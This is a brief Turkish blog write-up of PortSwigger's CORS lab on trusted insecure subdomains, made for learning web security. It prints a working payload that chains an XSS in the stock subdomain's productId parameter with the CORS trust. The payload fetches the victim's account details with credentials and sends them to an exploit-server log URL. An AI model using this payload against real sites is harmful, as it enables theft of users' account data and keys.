PortSwigger CORS Lab 3

Lab 3 URI https://portswigger.net/web-security/cors/lab-breaking-https-attack

Bu sefer lab ortamımız sub domainlerine güveniyor.

Origin: http://subdomain.ac7b1fad1e5f425a802f32be00c800a0.web-security-academy.net/

Ardından anasayfada bulunan ürünlerin stoğunu incelediğimizde çıkan yanıt ;

Ayrıca Product id parametresinde xss bulunmakta.

PoC’imizi düzenleyip exploit ediyoruz.

<script>
   document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

cors , cors vulnerability , cors zafiyeti , portswigger ctf , web ctf , web security
Bu yazıyı beğendin mi ?0000

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir